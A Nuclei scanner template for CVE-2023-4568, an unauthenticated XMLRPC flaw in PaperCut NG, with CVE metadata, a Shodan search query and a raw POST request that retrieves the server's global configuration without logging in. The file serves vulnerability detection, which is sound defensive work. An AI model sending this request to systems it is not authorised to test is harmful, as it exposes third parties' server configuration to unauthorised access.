nuclei-templates/http/cves/2023/CVE-2023-4568.yaml

56 lines
1.7 KiB
YAML

id: CVE-2023-4568
info:
name: PaperCut NG Unauthenticated XMLRPC Functionality
author: DhiyaneshDK
severity: medium
description: |
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4568
- https://www.tenable.com/security/research/tra-2023-31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-4568
cwe-id: CWE-287
epss-score: 0.00261
epss-percentile: 0.63693
cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: papercut
product: papercut_ng
shodan-query: html:"content="PaperCut""
tags: cve,cve2023,unauth,papercut
http:
- raw:
- |
POST /rpc/clients/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type:text/xml
<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'conf.ssl-port'
- 'conf.auth-ttl-default'
condition: and
- type: word
part: header
words:
- text/xml
- type: status
status:
- 200
# digest: 490a00463044022079ba2dc6322426adcdbfa018c602f605f38be79e4856eb141f4068a1c4a82269022042c119bd39b22cd2630bbad1bca38a4b740b93f2d7bbd03ef8f76cb07e8154f7:922c64590222798bb761d5b6d8e72950